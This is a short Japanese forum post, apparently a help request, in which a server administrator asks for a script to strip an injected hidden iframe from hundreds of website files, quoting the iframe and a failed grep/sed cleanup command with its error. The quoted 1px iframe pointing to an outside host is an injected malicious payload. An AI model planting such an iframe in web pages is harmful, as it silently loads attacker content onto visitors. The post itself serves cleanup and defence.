Linux サーバーから次の iframe マルウェアを削除するスクリプトを探しています。
<iframe width="1px" height="1px" src="http://ishigo.sytes.net/openstat/appropriate/promise-ourselves.php" style="display:block;" ></iframe>
私のサーバーのさまざまなWebサイトにある何百ものファイルに感染しました。私は試した
grep -rl ishigo.sytes.net * | sed 's/ /\ /g' | xargs sed -i 's/<iframe width="1px" height="1px" src="http://ishigo.sytes.net/openstat/appropriate/promise-ourselves.php" style="display:block;" ></iframe>//g'
しかし、それはただ出力します:
sed: -e expression #1, char 49: unknown option to `s'
あなたの助けに感謝 :)
乾杯ディー